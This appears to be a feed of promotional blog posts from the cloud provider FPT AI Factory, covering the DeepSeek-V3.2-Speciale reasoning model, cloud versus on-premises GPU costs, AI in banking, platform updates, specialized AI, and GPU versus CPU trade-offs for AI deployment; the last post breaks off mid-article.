
DeepSeek-V3.2-Speciale: A New Reasoning Rival for GPT-5 & Gemini-3.0?

11:38 31/12/2025
Less than a year after a knockout blow that stunned the AI industry, China's DeepSeek is back with a new open-source model and an ambitious set of claims that are turning heads across the tech world. The newly released DeepSeek-V3.2-Speciale, fully open-source, is touted by the company as capable of competing with, and in some cases even surpassing, the biggest names today, including OpenAI's GPT-5 and Google's Gemini 3 Pro.

DeepSeek-V3.2-Speciale is a large language model that demonstrates exceptionally strong reasoning across mathematical, algorithmic, and logic-intensive evaluations. According to DeepSeek's report, the model achieved gold-medal-level performance in both the 2025 International Mathematical Olympiad (IMO) and the 2025 International Olympiad in Informatics (IOI), showcasing its capacity to tackle highly structured mathematical proofs and algorithmic problems with precision rarely seen in AI systems. Its submissions to the ICPC World Finals 2025 also reached top-tier placements, rivalling expert human competitors in timed programming challenges.

Table 1: Performance of DeepSeek-V3.2-Speciale in top-tier mathematics and coding competitions

Key technical highlights

In comparisons with frontier models such as GPT-5, DeepSeek-V3.2-Speciale shows greater consistency in multi-step reasoning, clearer intermediate logic, and lower variance in problem-solving outputs. These characteristics make the model particularly effective on tasks where correctness, logical depth, and reasoning stability are critical, highlighting an important direction for progress in large language model reasoning.

What sets DeepSeek-V3.2-Speciale apart is not sheer scale alone but a design focused on efficient reasoning and problem decomposition.
DeepSeek-V3.2-Speciale has been optimized through a combination of sparse attention mechanisms and a scalable reinforcement learning framework to deliver higher consistency and deeper multi-step reasoning in domains that demand exact logical rigor.

Table 2: Benchmark performance and efficiency of reasoning models

Across a range of reasoning-heavy benchmarks, DeepSeek-V3.2-Speciale consistently matches or outperforms GPT-5 High and Gemini 3.0 Pro, particularly on tasks that emphasize mathematical rigor and multi-step logical reasoning, such as AIME 2025, HMMT Feb 2025, HMMT Nov 2025, and IMOAnswerBench.

Taken as a whole, the benchmark results suggest that DeepSeek-V3.2-Speciale has closed the reasoning gap with frontier models and, in several dimensions, moved ahead of them. Compared to GPT-5 and Gemini 3.0 Pro, it shows stronger consistency on reasoning-intensive tasks, with fewer performance drop-offs across problem distributions. Rather than excelling in isolated benchmarks, it delivers high, stable scores across mathematics, algorithmic reasoning, and competitive programming, indicating robustness rather than specialization in a single test format.

Relative to GPT-5, the results point to a clear trade-off: while GPT-5 remains broadly capable, its reasoning performance exhibits greater variance, whereas DeepSeek-V3.2-Speciale maintains more reliable accuracy on structured, multi-step problems. Against Gemini 3.0 Pro, which performs strongly on select benchmarks, DeepSeek-V3.2-Speciale distinguishes itself by sustaining top-tier performance across a wider range of reasoning evaluations, suggesting stronger generalization within the reasoning domain itself.

When to use DeepSeek-V3.2-Speciale

For practitioners, the implications are fairly clear once the nature of the task is defined.
When the problem is pure reasoning over a bounded input, such as proving a functional inequality, solving a difficult combinatorics problem, or designing a non-trivial algorithm from scratch, DeepSeek-V3.2-Speciale stands out as one of the strongest engines available.

However, real-world workflows often extend beyond this narrow but demanding class of problems. When a task begins to blend reasoning with broader context, such as drawing on up-to-date world knowledge, large multi-file codebases, shell commands, browsing, or multimodal inputs, raw contest performance becomes less decisive. In these mixed workflows, the broader ecosystem and tool integration matter more, and systems like GPT-5.1-High, Gemini-3-Pro, Claude-Opus-4.5, or even standard V3.2-Thinking often deliver better end-to-end results.

Conclusion

DeepSeek-V3.2-Speciale demonstrates that frontier-level reasoning can be achieved through focused design rather than sheer scale. Its strong, consistent performance on mathematical and algorithmic benchmarks places it among the most capable reasoning models available today. While it is not a universal solution for every workflow, on bounded, reasoning-heavy tasks it sets a new bar for reliability and logical depth, pointing toward a more specialized and purposeful direction for future language models.

To experience DeepSeek-V3.2-Speciale, visit our website at AI Marketplace. New users will receive up to 100 million tokens to explore and evaluate this robust model on real-world reasoning tasks.

Get started with DeepSeek-V3.2-Speciale here: https://marketplace.fptcloud.com/en

On-Premises vs. Cloud GPUs: Which Is More Cost-Effective?

13:32 30/12/2025
As AI, machine learning, and data science workloads continue to grow in scale and complexity, GPUs have become a critical piece of enterprise infrastructure. Many organizations now face a fundamental decision: whether to build and operate on-premises GPU clusters or adopt cloud-based platforms such as FPT AI Factory. While both options enable high-performance computing, their cost structures, scalability, and operational implications differ significantly. Understanding these differences is essential to choosing the right fit.

Upfront Investment and Capital Efficiency

Buying powerful GPUs is often seen as the main hurdle, but it is only one piece of the puzzle. An on-prem GPU infrastructure requires a full supporting environment to operate reliably: GPU servers, networking equipment, storage, supporting data center infrastructure, and experienced staff to maintain everything. High-performance GPUs can cost tens of thousands of dollars per unit, and production environments often require large clusters to support training, inference, and redundancy. Beyond hardware, organizations also absorb depreciation, long procurement cycles, and the risk of underutilized assets.

Cloud providers like FPT AI Factory remove this upfront barrier by delivering GPU resources as a service. Instead of owning hardware, enterprises can access high-performance GPUs on demand, converting capital expenditure into operating expenditure with a pay-as-you-go model. This allows organizations to allocate budget more flexibly as needs evolve.
| Cost Factor | On-Premises GPU Cluster | Cloud GPU |
| --- | --- | --- |
| Initial Hardware Investment | High upfront costs for GPUs, servers, and networking | No initial investment; pay-as-you-go |
| Infrastructure Setup | Requires data center space, power, and cooling | No data center costs; resources managed by the provider |
| Staffing Costs | Dedicated IT staff for maintenance and monitoring | Minimal IT staff required |
| Maintenance & Upgrades | Regular hardware replacements and software updates | Managed by the cloud provider at no extra cost |
| Operational Costs | Fixed monthly power, cooling, and space expenses | Variable, based on usage hours |
| Flexibility & Scalability | Limited by physical infrastructure | Easily scalable, flexible resource allocation |
| Monthly Cost Estimate | High (fixed costs, regardless of usage) | Variable (based on active usage only) |

To put it in perspective, a single H100 can cost up to $25,000 for the card alone, before the cost of the machine around it, data center amenities such as cooling, network links, and hosting, and the expertise required to operate and maintain it. By contrast, you could rent that same H100 on FPT AI Factory for tens of thousands of hours and still not reach the break-even point.

Scalability and Performance in Practice

On-prem GPU environments are often seen as more stable in terms of performance, but that stability depends heavily on how well the system is designed and maintained. Network congestion, storage limitations, or insufficient cooling can quickly become bottlenecks, reducing performance even when powerful GPUs are in place.

Cloud GPU platforms are built to address these challenges by offering high-performance GPU instances, including dedicated options for demanding AI workloads. In practice, teams can achieve performance that matches or even exceeds self-managed clusters, without having to manage infrastructure on their own.

Scalability is also where cloud solutions clearly stand out.
Teams can scale resources up for training, scale down after experiments complete, and switch between GPU types depending on the task. This flexibility matters for projects with varying demands. On-prem systems, by contrast, are limited by the hardware already purchased, making rapid growth expensive and slow.

Efficiency and Resource Utilization

A common challenge with on-prem GPU clusters is low utilization. GPUs may sit idle during off-peak hours or between projects, yet still incur full operational costs.

By contrast, cloud providers improve efficiency by allowing resources to be consumed only when needed. This is ideal for workloads such as batch data processing, model training cycles, experimentation, or inference with variable demand. Paying only for active usage helps eliminate waste and keeps costs aligned with the actual work being done.

Considerations for Choosing Between Cloud and On-Premises Solutions

Although cloud-based GPUs generally offer greater flexibility and efficiency, the final decision should be driven by an organization's specific workload characteristics and long-term strategy.

Workload duration and usage patterns play a critical role. Short-term, experimental, or highly variable workloads are better suited to cloud environments, where resources can be provisioned and released on demand. In contrast, stable, continuously running workloads may achieve better cost efficiency on on-premises GPU clusters.

Budget and operational resources are another key factor. Organizations with limited upfront capital or without specialized infrastructure teams often benefit from the cloud's lower operational overhead and managed services. Meanwhile, enterprises that already operate data centers and have dedicated IT staff may find long-term value in investing in on-premises hardware.

Scalability expectations should also be carefully evaluated.
When rapid growth or unpredictable demand is anticipated, cloud solutions provide the agility to scale instantly without large capital investments. This allows organizations to align infrastructure expansion closely with actual business needs, rather than over-provisioning resources in advance.

By carefully evaluating these factors, organizations can select the deployment model that delivers the best balance of performance, cost efficiency, and scalability.
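The own-versus-rent trade-off discussed above can be framed as a simple break-even calculation. The sketch below is illustrative only: the capital, operating, and hourly figures are assumptions for demonstration, not FPT AI Factory pricing.

```python
# Hypothetical break-even sketch: on-prem GPU ownership vs. cloud rental.
# All dollar figures are illustrative assumptions, not vendor pricing.

def breakeven_hours(capex_per_gpu: float,
                    yearly_opex_per_gpu: float,
                    amortization_years: float,
                    cloud_rate_per_hour: float) -> float:
    """Hours of cloud usage per GPU, over the amortization period, at which
    renting starts to cost more than owning."""
    total_owned_cost = capex_per_gpu + yearly_opex_per_gpu * amortization_years
    return total_owned_cost / cloud_rate_per_hour

# Example: $25k card + an assumed $8k/yr share of power, cooling, and staff,
# amortized over 3 years, against an assumed $3/hour cloud rate.
hours = breakeven_hours(25_000, 8_000, 3, 3.0)
print(f"Break-even at roughly {hours:,.0f} cloud GPU-hours over 3 years")
```

A workload that would not keep a GPU busy for that many hours over the amortization window favors renting; a cluster running near saturation around the clock shifts the balance toward ownership.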

FPT AI Factory in Review 2025: Taking the Lead in AI Innovation

11:48 24/12/2025
2025 marked a pivotal year for FPT AI Factory as we continued to advance our mission of building sovereign, enterprise-grade AI infrastructure that empowers innovation, accelerates productivity, and supports the global AI community. Backed by a deep collaboration with NVIDIA as an NVIDIA Preferred Partner, FPT AI Factory has evolved into a comprehensive ecosystem for end-to-end AI development, serving enterprises, startups, and AI practitioners across multiple markets.

Driving AI Innovation at Scale

Throughout 2025, FPT AI Factory delivered tangible progress in scale, performance, and adoption. The platform launched 43 AI services covering the full AI lifecycle, from data processing and model training to deployment, inference, and monitoring.

One of the most significant milestones was the processing of 1,111 billion tokens across various AI workloads, enabling large-scale experimentation and production use of advanced language models. The platform also expanded its portfolio to 70+ AI models, including both internally developed models and leading open and commercial models, giving users the flexibility to build solutions tailored to their specific needs.

Empowering a Growing AI Community

Beyond technology, 2025 was about empowering people. FPT AI Factory became a trusted platform for a rapidly growing AI ecosystem, supporting 18,853 AI scientists, application developers, and AI engineers.

FPT AI Factory also played a critical role in nurturing innovation at the grassroots level, partnering with 20+ AI startups and providing the foundational infrastructure for more than 8 AI competitions. These initiatives not only helped discover new talent but also accelerated real-world AI applications, contributing to the long-term development of Vietnam's AI ecosystem.
A Comprehensive Ecosystem for End-to-End AI Development

FPT AI Factory continued to strengthen its position as a one-stop platform for AI development, integrating infrastructure, tools, models, and services into a unified ecosystem. From scalable GPU computing and secure data environments to model marketplaces and deployment pipelines, the platform enables teams to move seamlessly from idea to production.

This holistic approach reflects FPT's philosophy of "Build Your Own AI": empowering organizations and individuals to develop, customize, and scale AI solutions independently, while maintaining full control over data, models, and deployment strategies.

New Product Highlight: AI Notebook

One of the most notable product launches of 2025 was AI Notebook. Built on NVIDIA-accelerated computing and the open-source Jupyter Notebook architecture, AI Notebook delivers a powerful, cloud-based coding workspace for AI engineers, developers, and researchers.

With one-click deployment and an embedded notebook gallery, AI Notebook significantly reduces setup time and complexity. Its cost-efficient model - free CPU usage with pay-as-you-go GPU pricing - allows teams to experiment freely while maintaining full cost transparency and control. With 400+ labs created in just one month, AI Notebook is on its way to becoming a preferred environment for rapid prototyping, experimentation, and model refinement.

Enterprise-Grade Security and Proven Quality

Security and trust remain our top priorities. FPT AI Factory achieved and maintained a comprehensive set of international certifications, including ISO/IEC 27001:2022, ISO/IEC 27017:2015, ISO/IEC 27018:2019, PCI DSS, SOC 2, and SOC 3, ensuring the highest standards of information security, cloud governance, and data protection.

In terms of computing capability, FPT AI Factory continued to rank among the world's leading AI infrastructures, reaching Top 36 globally for the Japan site and Top 38 globally for the Vietnam site.
These rankings reflect the platform's large-scale deployment of advanced GPU technologies, including NVIDIA H100 and H200, enabling high-performance AI workloads at enterprise and national scale.

Looking Ahead

As we reflect on 2025, FPT AI Factory stands as more than just an AI platform. It is a foundation for innovation, a catalyst for productivity growth, and a strategic enabler for organizations seeking to lead in the AI era. With a robust ecosystem, strong community engagement, and a clear vision for sovereign and sustainable AI development, FPT AI Factory is well positioned to drive the next wave of AI innovation in 2026 and beyond.

Together with our partners, customers, and the global AI community, we look forward to continuing this journey: building AI, shaping the future, and empowering innovation at scale.

How AI Is Flipping "the Pyramid" Business Model of the Banking Industry

10:55 24/12/2025
For decades, the banking business model followed a familiar pattern: the majority of investment in technology, people, and processes was directed toward the middle and back office. According to IBM, between two-thirds and three-quarters of total banking investment has historically gone into core systems, risk, finance, operations, and compliance. These investments were necessary to ensure stability, control, and regulatory adherence, but they came at a cost. Front-office functions such as customer experience, digital channels, ecosystems, platforms, and partnerships were often treated as secondary priorities rather than strategic drivers of growth.

Once a strength, now a limitation

Over time, this imbalance created a structural problem. Banks built increasingly complex and expensive operating environments, supported by monolithic core systems that were designed for control rather than change. Processes became rigid, highly customized, and deeply interdependent. As a result, even small changes to products, pricing, or customer journeys now require significant time, coordination, and cost. What was once a source of strength, scale and standardization, has become a constraint in a market that increasingly values speed, flexibility, and personalization.

These structural characteristics define the core limitations of the traditional banking business model today. High fixed costs make it difficult to compete with digital-native players that operate on lighter platforms. Legacy systems limit the ability to innovate quickly or integrate with external ecosystems. Customer experiences remain fragmented across channels, while personalization is constrained by both technology and organizational silos. Risk and compliance functions, built on static rules and historical data, struggle to keep pace with rapidly changing customer behavior and fraud patterns.
Reshaping the business model

By reducing complexity, increasing flexibility, and enabling intelligence across the front, middle, and back office, AI is beginning to change the economics and operating logic of banking itself.

Back office

Back-office processes such as document verification, KYC checks, and regulatory reporting consume significant resources. These tasks appear routine, but at scale they create real friction: a single customer onboarding can involve dozens of documents and manual checks across multiple channels.

AI systems can address these tasks directly by automating cognitive, document-heavy work that was previously difficult to scale. They can now read, classify, extract, and validate information across large volumes of structured and unstructured data.

For example, JPMorgan Chase has deployed AI extensively across its operations and risk functions. One widely cited use case is COiN (Contract Intelligence), an AI system that reviews commercial loan agreements. Tasks that once required 360,000 hours of legal and operational work per year are now completed in seconds, with higher consistency and lower operational risk.

Middle office

In the middle office, AI is transforming risk management and credit decisioning. Banks such as HSBC and ING have invested heavily in AI-driven models that analyze transactional behavior and unstructured data to support credit decisions and financial crime monitoring.

These systems continuously analyze transaction data, behavioral patterns, and external signals to deliver real-time, explainable risk insights. They also filter noise, prioritize genuinely high-risk cases, and support faster, more granular credit decisions.

As a result, credit teams no longer need to spend days on each decision, and fraud and AML teams no longer need to manually review large volumes of alerts that ultimately prove to be false positives.
Front office

In customer service, AI-powered assistants are no longer simple chatbots that follow predefined scripts. Modern systems can understand context, summarize long interaction histories, and resolve increasingly complex requests. Large retail banks that have deployed advanced AI assistants report that between 30 and 50 percent of customer inquiries are now handled without human intervention. This has reduced average handling times in call centers by as much as 40 percent, while allowing human agents to focus on higher-value interactions.

In short, AI is reshaping the banking operating model end to end: simplifying the back office, accelerating decision-making in the middle office, and elevating customer experience at the front. But these capabilities do not emerge in isolation.

For example, advanced customer-facing AI, such as a modern chatbot that can understand complex, multi-step requests and respond with context and accuracy, depends on far more than a standalone model. It requires a reliable pipeline to ingest data, train and fine-tune models, orchestrate inference, and enforce governance consistently across the organization. This is where the concept of an AI Factory becomes critical.

AI Factory: The Next Destination for the Financial Industry

An AI Factory provides the industrial backbone that enables AI to move from isolated pilots to enterprise-scale capabilities. It brings together data, models, compute power, security, and operational controls into a repeatable production environment. Without it, big banks will struggle to maintain consistency, explainability, and reliability, especially when AI is embedded across back-, middle-, and front-office processes.

To be more specific, a chatbot that can handle complex customer requests relies on more than natural language understanding.
It must access back-office data such as KYC records and transaction history, apply middle-office risk and compliance intelligence, and respond in real time under strict accuracy and security controls. An AI Factory makes this possible by enabling continuous model training, real-time inference, and ongoing monitoring.

Across the global banking industry, leading institutions are already harnessing AI factories to develop domain-aware AI for banking operations. According to NVIDIA, banks across Europe are building regional AI factories to deploy AI models for customer service, fraud detection, risk modeling, and the automation of regulatory compliance. In Germany, Finanz Informatik, the digital technology provider of the Savings Banks Finance Group, is scaling its on-premises AI factory for applications including an AI assistant that helps employees automate routine tasks and efficiently process the institution's banking data.

In Asia, FPT launched FPT AI Factory in Japan and Vietnam, equipped with thousands of cutting-edge NVIDIA H100/H200 GPUs delivering exceptional computing power. With this computational strength, banks can drastically reduce research time while accelerating AI solution development and deployment by more than 1,000 times compared with traditional methods. This helps enterprises reduce operating costs by up to 30 percent while accelerating the development of domain-specific AI applications, such as credit fraud detection systems and intelligent virtual assistants, by up to 10 times.
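As a toy illustration of the document-heavy back-office automation described above, the sketch below pulls key fields out of a contract-like text and validates that all of them were found. Production systems such as contract-intelligence platforms use trained models rather than regular expressions; the document text, field names, and patterns here are invented purely to show the extract-and-validate pattern.

```python
# Toy sketch of back-office document extraction and validation.
# Real systems use trained models; regexes here only illustrate the pattern.
import re

# Invented example document, not a real agreement.
DOC = """Commercial Loan Agreement
Borrower: Acme Manufacturing Ltd.
Principal Amount: USD 1,500,000
Interest Rate: 6.25% per annum
Maturity Date: 2028-06-30"""

def extract_fields(text: str) -> dict:
    """Extract a few structured fields from a contract-like document."""
    patterns = {
        "borrower": r"Borrower:\s*(.+)",
        "principal_usd": r"Principal Amount:\s*USD\s*([\d,]+)",
        "rate_pct": r"Interest Rate:\s*([\d.]+)%",
        "maturity": r"Maturity Date:\s*(\d{4}-\d{2}-\d{2})",
    }
    out = {}
    for key, pat in patterns.items():
        m = re.search(pat, text)
        out[key] = m.group(1).strip() if m else None
    return out

fields = extract_fields(DOC)
# Validation step: every required field must be present before the
# record can flow into downstream onboarding or reporting systems.
assert all(v is not None for v in fields.values())
print(fields)
```

The same read-classify-extract-validate loop, scaled across millions of documents, is what turns a weeks-long manual review queue into an automated pipeline.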

What’s New on FPT AI Factory

09:49 15/12/2025
We continue to advance the FPT AI Factory platform to improve scalability, performance, and operational efficiency. This release, as of December 12, 2025, introduces new features and optimizations designed to make your workflows smoother and more efficient.

FPT AI Studio

Accelerate LLM workflows with new optimization techniques and gain real-time visibility through Grafana-integrated UI Logs.

New features
1. Full support for the Qwen3VL model: Users can leverage the state-of-the-art multimodal capabilities of the Qwen3VL model family for tasks such as visual understanding across AI Studio and related services.
2. Model Catalog download via SDK: Downloading the Model Catalog through the SDK gives developers a faster, automated way to integrate and manage models, improving workflow efficiency.

AI Notebook

Boost automation, ease of use, and performance, helping customers work faster and smarter with AI Notebook.

New features
1. Automated Lab Version Upgrade: Removes the manual steps of deleting old labs and remapping during version upgrades, saving time and reducing errors.
2. Event Notification Scheduling: Enables scheduled system and feature announcements directly in AI Notebook, ensuring users stay informed without disruption.
3. Notebook Gallery: Offers ready-to-use notebooks for common use cases across various topics, allowing quick reference and execution to accelerate development.
4. GPU Quota Control: Introduces per-tenant GPU usage limits for better resource allocation and cost management, ensuring fair and efficient utilization.

FPT AI Inference

Achieve operational stability with new upgrades to the LiteLLM engine, billing, Kafka, and top-up services.

New features
1. Infrastructure & API Stability
- LiteLLM Upgrade: Enhances system resilience and processing efficiency with the upgraded LiteLLM architecture.
- API Standardization: Ensures consistent data output and improved integration capabilities by optimizing and standardizing the v1/responses/ parameter.
2. Production Go-Live & Core Services
- Seamless Payments & Billing: Enjoy instant account top-ups and accurate, real-time service charge tracking.
- High-Performance Connectivity: Experience a faster, smoother platform with improved stability for real-time interactions.
- Enhanced User Feedback: Clearer interaction through upgraded popups providing instant status updates on your actions.

Billing

Foster real-time tracking, transparent cost insights, and a centralized dashboard for all usage-related information.

New feature
Product Usage: Users can better manage budgets, optimize resource consumption, and make data-driven decisions with confidence. A centralized interface displays:
- Total cost of all services.
- Real-time updates for the current billing period.
- Cost breakdown by product category: GPU Container, AI Inference, Model Fine-Tuning, Model Hub, and Interactive Session.

Use cases
- View total usage and spending across all FPT AI Factory services in a single, unified dashboard.
- Track detailed usage history (GPU Container, AI Inference, Model Fine-Tuning, Interactive Session, Model Hub) by day, month, or year.
- Monitor real-time costs to prevent unexpected overspending and improve budget control.

Specialized AI: Delivering the Last Mile of Practical Intelligence

15:43 12/12/2025
Today, artificial intelligence is entering its own last mile. This phase of AI development is increasingly defined by specialized AI: systems designed and trained to accomplish a well-defined task or operate within a narrow domain. These models trade breadth for depth, focusing on performance, accuracy, and reliability in a specific area. And they represent the fastest-growing layer of the AI ecosystem.

Specialized AI stands in clear contrast to generalized AI, the broad-knowledge systems used by millions, such as ChatGPT, Claude, Gemini, or Perplexity. Generalized models are designed to handle an enormous range of questions and tasks, which makes them powerful, flexible, and easy to adopt across industries. However, this breadth also means they are not always the best fit for problems that demand deep domain expertise or strict accuracy. Work like clinical trial analysis, materials science modeling, algorithmic trading, or other high-stakes technical processes often requires a level of precision that broad models are not built to deliver.

Open Source and AI Agents: The Different Shapes of Specialized AI

Developing targeted AI solutions requires the right technical components. Organizations can take several approaches:

AI Agents Based on Open-Source Models: Teams can build agents customized for a specific function. Multiple agents can be orchestrated into a larger agentic system capable of handling multi-step, complex workflows.

Retrieval-Augmented Generation (RAG) and Model Context Protocol (MCP): These tools allow developers to incorporate proprietary data and fine-tune models to handle domain-specific tasks with higher accuracy.

Mixture of Experts (MoE) Architectures: MoE models activate specialized sub-networks depending on the input. By engaging only the parts of the network needed for the task, this design often delivers up to 10x better throughput without sacrificing capability.
Small Language Models (SLMs): Because of their compact size, SLMs can be trained on highly specialized datasets and deployed efficiently while still offering strong performance on narrow tasks.

These examples represent only a portion of the approaches available for developing specialized AI solutions. In practice, many systems will combine several of these methods, while others may incorporate entirely different architectural elements depending on the requirements of the domain. Across the broader ecosystem, engineers are continuously designing new tools, refining model architectures, and advancing the underlying AI stack. Their work is expanding the range of what specialized AI can accomplish and enabling models to operate with greater precision, efficiency, and adaptability.

One of the keys to bridging the gap between generalized models and specialized AI solutions is utilizing foundation models and open-source toolsets, such as those offered by platforms like FPT AI Studio.

Built on robust infrastructure powered by high-performance GPUs and designed to support the full model development lifecycle, from data preparation and customization to deployment, the platform allows enterprises to fine-tune large language models and transform them into true subject-matter experts in their own field.

Besides ensuring that models are tailored to reflect proprietary knowledge and operational needs, FPT AI Studio also enables faster inference and reduces computing costs, helping organizations achieve both technical precision and practical efficiency in their AI initiatives.

Specialized AI in Action

Specialized AI is already transforming industries, as enterprises, startups, and the entire ecosystem of developers build out this final stage of the AI landscape.

For instance, PayPal is building agent-driven infrastructure to accelerate intelligent commerce.
These agents will enable the first wave of conversational commerce experiences, where agents can shop, buy, and pay on a user's behalf, an interesting example of how specialized AI can work alongside generalized AI to accomplish specific tasks for individuals.

Synopsys is pioneering an agentic AI framework for semiconductor design and manufacturing. Built on tuned open-source models, the framework supports key stages of the chip development process, enhancing engineering productivity, improving design quality, and shortening time to market. This effort also contributes to broader innovation across the silicon-to-systems ecosystem.

Moreover, pharmaceutical companies are applying AI to drug discovery. Chemical companies are using it to explore new materials. Healthcare organizations are building models for disease-specific treatment. Financial institutions are deploying AI to detect market patterns and anomalies.

These examples represent only a fraction of what is emerging. The number of potential specialized AI applications is virtually unlimited. As more enterprises, researchers, and developers build open-source tools and advanced model architectures, specialized AI will continue to define the next wave of innovation.

Source: NVIDIA
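The MoE routing idea described earlier, where only a few specialized sub-networks run per input, can be sketched in a few lines. Everything here (the "experts", the fixed gate scores) is a stand-in for illustration, not a real model or any particular framework's API.

```python
# Toy sketch of Mixture-of-Experts routing: only the top-k scoring
# "experts" process a given input, so most of the network stays idle.
# The experts and the gating scores below are illustrative stand-ins.

def route_top_k(scores, k):
    """Return indices of the k highest-scoring experts."""
    return sorted(range(len(scores)), key=lambda i: scores[i], reverse=True)[:k]

def moe_forward(x, experts, gate, k=2):
    """Run only the top-k experts; combine their outputs weighted
    by the normalized gate scores."""
    scores = gate(x)
    active = route_top_k(scores, k)
    total = sum(scores[i] for i in active)
    return sum(scores[i] / total * experts[i](x) for i in active)

# Four tiny "experts"; a fixed gate stands in for a learned router.
experts = [lambda x: x + 1, lambda x: x * 2, lambda x: x - 1, lambda x: -x]
gate = lambda x: [1.0, 4.0, 2.0, 0.5]

result = moe_forward(3.0, experts, gate, k=2)  # only experts 1 and 2 run
print(result)
```

With k experts active out of n, only a k/n fraction of the parameters does work per token, which is where the throughput gains of MoE architectures come from.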

Is GPU Always Better? An Impact Assessment on AI Deployment Performance

15:17 02/12/2025
In the era of Artificial Intelligence (AI), selecting the right computing hardware is a pivotal decision that directly dictates the efficiency and economics of deployment. This article offers a comparative analysis of the impact of the Graphics Processing Unit (GPU) and the Central Processing Unit (CPU) on AI model performance. Each processor type is designed with different architectural advantages, making it well suited to specific tasks and performance requirements. Rather than viewing one as universally superior to the other, it is more accurate to see them as complementary technologies that together shape the efficiency and scalability of AI workloads.

GPUs started out as processors for graphics rendering and became known as graphics cards, yet they are now capable of far more than handling visuals. With recent advancements such as the NVIDIA H100 and H200, these processors have become an indispensable powerhouse in the AI field, especially for complex neural networks, deep learning (DL), and machine learning (ML) tasks.

The NVIDIA H100 GPU introduced significant improvements in computational throughput and memory bandwidth, while the H200 further enhances efficiency, scalability, and AI-specific acceleration features. Both processors are designed with specialized tensor cores, large high-speed memory, and massive parallel processing capabilities that enable thousands of calculations to be performed simultaneously. These advancements unlock breakthroughs in fields such as computer vision, natural language processing, and generative AI.

CPUs, on the other hand, offer strengths in versatility, sequential processing efficiency, and handling a wide variety of general-purpose tasks. They are essential for system orchestration, managing GPUs, and supporting lighter AI inference workloads.
With strong single-thread performance and adaptability, CPUs continue to play a critical role in ensuring stability, responsiveness, and overall system balance.

Comparison of processing performance between GPUs and CPUs

GPUs deliver significantly higher processing performance for AI tasks thanks to their ability to handle thousands of parallel operations at once. This makes them much faster for deep learning training, large-scale inference, and workloads that rely heavily on matrix computations.

CPUs offer lower performance for heavy AI workloads but excel in single-thread speed and sequential processing. They are efficient for general-purpose tasks, system logic, and lighter AI inference, where responsiveness matters more than raw parallel power.

Analyzing latency differences of GPUs and CPUs for AI deployment

For large AI workloads, GPUs can handle data quickly, but for small or simple tasks, the overhead of transferring data to the GPU can introduce additional latency. GPUs are most efficient when processing large batches rather than single requests.

Conversely, CPUs generally have lower latency for small-scale or real-time AI tasks, since data can be processed immediately without transfer overhead. This makes them better suited for applications where quick response times are critical.

The flexibility of GPUs and CPUs

GPUs are specialized for parallel tasks, making them less flexible for general-purpose computing. While excellent for AI tasks like deep learning, they may not handle a wide range of workloads as efficiently as CPUs.

CPUs are more flexible and versatile, capable of handling a wide variety of tasks, including general-purpose AI computations. They can efficiently manage both single-threaded and multi-threaded workloads, making them ideal for a broader range of AI applications.

Cost Implications of GPUs and CPUs

Due to their specialized architecture and high performance, GPUs are generally more expensive than CPUs.
The cost can be higher for both the hardware and the energy consumption when running large-scale AI tasks. In comparison, CPUs offer a more cost-effective solution for smaller AI tasks or less resource-intensive applications. However, for large-scale AI, multiple CPUs may be needed to match the performance of a single GPU. For example, Cornell University's studies show that running certain scientific computing or AI workloads on an NVIDIA DGX-H100 can be about 80 times faster than running the same workload on 128 CPU cores, illustrating that tens or even hundreds of CPUs may be needed to match its throughput.

When to choose the right processor for AI workloads

| | When CPUs Are a Better Option | When GPUs Are a Better Option |
|---|---|---|
| Model Size | Suitable for small and lightweight models | Ideal for large models (LLMs, high-res vision models) |
| Parallelism Needs | Optimized for sequential tasks, limited parallelism | Highly efficient for tensor operations, massive parallelism |
| Type of Workload | Data preprocessing, logic-heavy tasks, light inference | Training large models, heavy inference, high-volume data processing |
| Scalability | Limited scaling for AI | High scalability for large-scale AI deployments |
| Typical Use Cases | Light inference, orchestration (managing GPUs), traditional workloads, microservices | LLMs, high-resolution vision, video processing, real-time rendering, speech recognition, high-QPS services |
| Cost | More cost-effective, lower hardware and power costs | Higher cost due to specialized hardware and energy usage |

AI workloads differ greatly, and not all require GPU acceleration. Smaller models, such as classical ML algorithms or lightweight recommenders, run well on CPUs without losing responsiveness. In contrast, large-scale models such as LLMs, VLMs, high-resolution image generators, and real-time speech systems depend on GPUs for the parallel processing and speed needed to operate effectively.
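As a rough illustration of these decision criteria, the sketch below encodes them as a simple Python heuristic. The 7B-parameter cutoff and the fp16 (2 bytes per parameter) figure are illustrative assumptions chosen for this sketch, not official sizing guidance.

```python
# Rule-of-thumb helpers mirroring the CPU-vs-GPU comparison criteria above.
# Thresholds and the fp16 assumption are illustrative, not vendor guidance.

def weight_memory_gb(params_billions: float, bytes_per_param: float = 2) -> float:
    """Approximate GB needed just to hold the weights (fp16 = 2 bytes/param)."""
    # params_billions * 1e9 params * bytes / 1e9 bytes-per-GB simplifies to:
    return params_billions * bytes_per_param

def recommend_processor(params_billions: float,
                        heavy_parallelism: bool = False,
                        high_volume: bool = False) -> str:
    """Return 'GPU' or 'CPU' following the comparison criteria."""
    if params_billions >= 7:                # large models: LLMs, high-res vision
        return "GPU"
    if heavy_parallelism or high_volume:    # tensor-heavy or high-QPS workloads
        return "GPU"
    return "CPU"                            # light inference, orchestration, logic

# A 7B chat model needs ~14 GB for fp16 weights alone; a 70B model ~140 GB,
# which already puts it in multi-GPU territory.
```

For instance, `recommend_processor(70)` returns `"GPU"`, while a small classical model with no parallelism needs, `recommend_processor(0.05)`, returns `"CPU"`.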
For example, modern LLMs like GPT-style models contain billions of parameters that must be processed in parallel to generate responses quickly. Running a 7B or 13B model for tasks such as customer-service chatbots, document summarization, or code assistance may still be feasible on CPUs in low-traffic environments, but once the model scales to 30B, 70B, or more, GPUs become essential to maintain acceptable response times, especially for production workloads.

Similarly, VLM tasks like image captioning, real-time object recognition, or multimodal assistants for manufacturing and retail rely heavily on parallel tensor operations, making GPUs the only practical option. For example, a multimodal customer-support bot that interprets product images must leverage GPUs to process both visual embeddings and language outputs at speed.

Leveraging CPUs and GPUs Together

Both CPUs and GPUs are processing units that can handle similar tasks, but their performance varies depending on the specific needs of an application. Despite being more powerful for parallel workloads, GPUs are not meant to replace CPUs. Each is a crucial unit in its own right, built from components designed and organized for different types of operations, and using both together can cut costs while maximizing the output of AI systems.

Several hybrid AI frameworks have been developed to integrate both CPUs and GPUs, optimizing efficiency by leveraging the strengths of each processor: CPUs handle simpler computing tasks, while GPUs take on more complex operations.

For example, deep learning and machine learning require vast amounts of data to be processed and trained effectively. This data often needs significant refinement and optimization to ensure the model can interpret it correctly. These preliminary tasks are well-suited to a CPU, which can handle the basic processing and preparation of the data.
